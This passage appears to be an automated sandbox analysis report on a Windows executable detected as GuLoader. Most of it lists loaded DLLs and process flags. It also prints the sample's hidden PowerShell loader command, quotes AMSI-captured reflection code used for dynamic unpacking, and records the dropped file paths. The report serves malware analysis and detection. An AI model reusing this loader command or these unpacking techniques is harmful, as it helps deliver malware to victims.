Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

File written: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Meir.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: cqWZtEH4eJ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.1742599713.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\System.Core.pdb] source: powershell.exe, 00000002.00000002.1751763433.00000000080EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5. source: powershell.exe, 00000002.00000002.1735564109.0000000002930000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.1752763679.0000000009FA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((landsdels $privatskole $Stablevogne), (Nosy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vagtsomhed = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Enfold)), $Recessional).DefineDynamicModule($Streg, $false).DefineType($Krselsretningerne, $Hovedstadsomraadets, [System.MulticastDele

Suspicious powershell command line found

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) "
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07128764 push eax; ret	2_2_07128771
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07120FC4 push es; iretd	2_2_07120FC7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2521CFAC push esp; retn 22A6h	4_2_2521E735
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_2521F4E1 push es; ret	4_2_2521F4F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
